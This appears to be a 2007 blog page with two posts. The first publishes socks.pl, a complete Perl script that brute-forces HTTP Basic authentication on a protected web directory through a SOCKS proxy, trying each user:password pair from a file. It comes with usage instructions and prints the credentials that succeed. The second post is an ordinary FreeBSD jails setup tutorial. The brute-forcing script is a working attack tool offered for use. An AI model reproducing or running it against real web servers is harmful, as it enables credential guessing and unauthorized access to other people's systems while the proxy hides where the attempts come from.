Sunday, October 14, 2007

HTTP Basic auth brute forcer that connects via a socks proxy

socks.pl is a perl script that connects to a socks proxy and try's every user and password in the file given against a protected web directory.

Modules needed IO::Socket::Socks, MIME::Base64 and Getopt::Std

Usage:
perl socks.pl -s SOCKS_PROXY -d WEB_DIR -f USER_FILE -i WEB_SERVER -p PROXY_PORT -P WEB_SERVER_PORT

USER_FILE Format:
User:Pass

References:
RFC1945

use IO::Socket::Socks;
use MIME::Base64;
use Getopt::Std;
use strict;

sub setOpts {

    my $optString='s:p:f:d:i:P:';
    my %opt;

    my %configHash;

    if($#ARGV >=11) {
        getopts($optString,\%opt) or printError("Error on use $0 -s Proxy Server -d Protected File  -f User and Password File -p proxyport -i Web Server IP -P Web Server Port");
        $configHash{'PServer'}=$opt{'s'} if(defined($opt{'s'}));
        $configHash{'PPort'}=$opt{'p'} if(defined($opt{'p'}));
        $configHash{'SIP'}=$opt{'i'} if(defined($opt{'i'}));
        $configHash{'SPort'}=$opt{'P'} if(defined($opt{'P'}));
        $configHash{'Sdir'}=$opt{'d'} if(defined($opt{'d'}));
        $configHash{'IDfile'}=$opt{'f'} if(defined($opt{'f'}));

    }
    else {
        printError("Error on use $0 -s Proxy Server -d Protected File  -f User and Password File -p proxyport -i Web Server IP -P Web Server Port");

    }
    return %configHash;
}

sub connectProxy {

    my %configHash=@_;
    $configHash{'sock'} = new IO::Socket::Socks(ProxyAddr=>$configHash{'PServer'}, 
                                                ProxyPort=>$configHash{'PPort'}, 
                                                ConnectAddr=>$configHash{'SIP'},
                                                ConnectPort=>$configHash{'SPort'}) or die($!);
    return %configHash;

}

sub printError {
 my $errorMsg=$_[0];

 print STDERR $errorMsg."\n";
 exit();
}

sub checkFile {
 my $fileName=$_[0];
 printError("Please check file $fileName") if (! -f $fileName);

}

sub loadFile { my %configHash=@_;
 open(USER,'<',$configHash{'IDfile'}) or printError("$! on file $configHash{'IDfile'}");

}


sub convUserPass{
    my %configHash=@_;

    $configHash{'encUserPass'}=encode_base64($configHash{'userInfo'});

    return %configHash;

}

sub logIN {
    my %configHash=@_;

    while(<USER>) {
        %configHash=connectProxy(%configHash);
        $configHash{'userInfo'}=$_;

        chomp($configHash{'userInfo'});
        %configHash=convUserPass(%configHash);

        my $socks=$configHash{'sock'};

        print $socks "GET ".$configHash{'Sdir'}." HTTP/1.0\nHost: localhost\nAuthorization: Basic ".$configHash{'encUserPass'}."\n\n";

        my $rsp;
        $socks->read($rsp,15);

        print $configHash{'userInfo'}."\n" if($rsp eq 'HTTP/1.1 200 OK');

    }
}

sub closeProxy {
    my %configHash=@_;

    %configHash=connectProxy(%configHash)->close();
}

sub init {

    my %configHash=setOpts();

    checkFile($configHash{'IDfile'});
    loadFile(%configHash);

    logIN(%configHash);

}
init();
Posted by at No comments:
Labels:

Saturday, October 13, 2007

FreeBSD jails the easy way

Jails are a nice easy way to isolate processes in FreeBSD. A jail makes it possible to run services in a virtual system keeping them from interacting with the host system. More in depth information can be found here .

Most if not all of the tutorials I have found have you recompile the system into a new directory like the section6 wiki. This just seems overly complicated and hard to do especially if you are in a pinch for time. Getting ready for a security competition my partner Sean Jordan introduced me to the sysinstall method of making jails.

When making partitions I like to create a /jail partition to give the jails their own partition. I suggest making it at least 2 gigs for each jail. Also remember all the files used by the users / services in the jail need to be on that partition so size it accordingly. Each jail needs it's own ip address, for my set up I am behind a router running nat using the subnet 172.16.67.0/24.

Once FreeBSD is installed start making the needed directories.

  1. mkdir /jail/master
  2. mkdir /jail/master/usr/
  3. cp -R /bin/ /jail/master/bin
  4. cp -R /etc/ /jail/master/etc
  5. cp -R /lib/ /jail/master/lib
  6. cp -R /libexec/ /jail/master/libexec
  7. cp -R /sbin/ /jail/master/sbin
  8. cp -R /usr/share /jail/master/usr/share
  9. cp -R /usr/bin /jail/master/usr/bin
  10. cp -R /usr/sbin /jail/master/usr/sbin
  11. cp -R /usr/lib /jail/master/usr/lib
Once you have all the need directories chroot your self into /jail/master and run sysinstall
  1. chroot /jail/master /bin/csh
  2. /usr/sbin/sysinstall
Once you are in choose
  1. Configure
  2. Distributions
  3. base
  4. (use ftp for media source)
  5. exit sysinstall
When you have the whole base distributions exit the chroot
  1. exit
For demonstration purposes I'll create 2 jails ssh and dns
  1. cp -R /jail/master/ /jail/ssh
  2. cp -R /jail/master/ /jail/dns
After the directories are made edit /etc/rc.conf
  1. vi /etc/rc.conf
Add the following lines

  1. ifconfig_lnc0_alias0="172.16.67.47 netmask 255.255.255.0" #Add alias for your network
  2. ifconfig_lnc0_alias1="172.16.67.48 netmask 255.255.255.0" #Add alias for your network
  3. jail_enable="YES" # Set to NO to disable starting of any jails
  4. jail_list="ssh dns" # Space separated list of names of jails
  5. jail_set_hostname_allow="NO" # Allow root user in a jail to change its hostname
  6. jail_socket_unixiproute_only="YES" # Route only TCP/IP within a jail
  7. jail_ssh_rootdir="/jail/ssh"
  8. jail_ssh_hostname="ssh.bsd.local"
  9. jail_ssh_ip="172.16.67.47"
  10. jail_ssh_exec_start="/bin/sh /etc/rc"
  11. jail_ssh_devfs_enable="YES"
  12. jail_ssh_devfs_ruleset="devfsrules_jail"
  13. jail_dns_rootdir="/jail/dns"
  14. jail_dns_hostname="dns.bsd.local"
  15. jail_dns_ip="172.16.67.48"
  16. jail_dns_exec_start="/bin/sh /etc/rc"
  17. jail_dns_devfs_enable="YES"
  18. jail_dns_devfs_ruleset="devfsrules_jail"
Once the file is saved start the jails and setup the nic
  1. sh /etc/rc
Check to see that the jails are running by using jls
  • JID IP Address Hostname Path
  • 2 172.16.67.48 dns.bsd.local /jail/dns
  • 1 172.16.67.47 ssh.bsd.local /jail/ssh
Check to see if the interface is listening on the correct ip address by running ifconfig

  • lnc0: flags=108843 mtu 1500
  • inet6 fe80::20c:29ff:fe3c:1ce8%lnc0 prefixlen 64 scopeid 0x1
  • inet 172.16.67.46 netmask 0xffffff00 broadcast 172.16.67.255
  • inet172.16.67.47 netmask 0xffffff00 broadcast 172.16.67.255
  • inet 172.16.67.48 netmask 0xffffff00 broadcast 172.16.67.255

To enter a jail use jexec
  1. jexec 1 /usr/local/bin/bash
Stopping jails can be done in two ways /etc/rc.d/jail or pkill.
To stop all running jails run
  1. /etc/rc.d/jail stop
To stop just 1 jail run
  1. pkill -j JID
Once you are in the jail you can do what ever you would do on a normal system. If you want to use icmp within the set security.jail.allow_raw_sockets to 1 in /etc/sysctl.conf
  1. security.jail.allow_raw_sockets=1
On a final note there are no users within the jail yet and the root user has no password so be sure to set one using the passwd command.
Posted by at 2 comments:
Labels:
Subscribe to: Posts (Atom)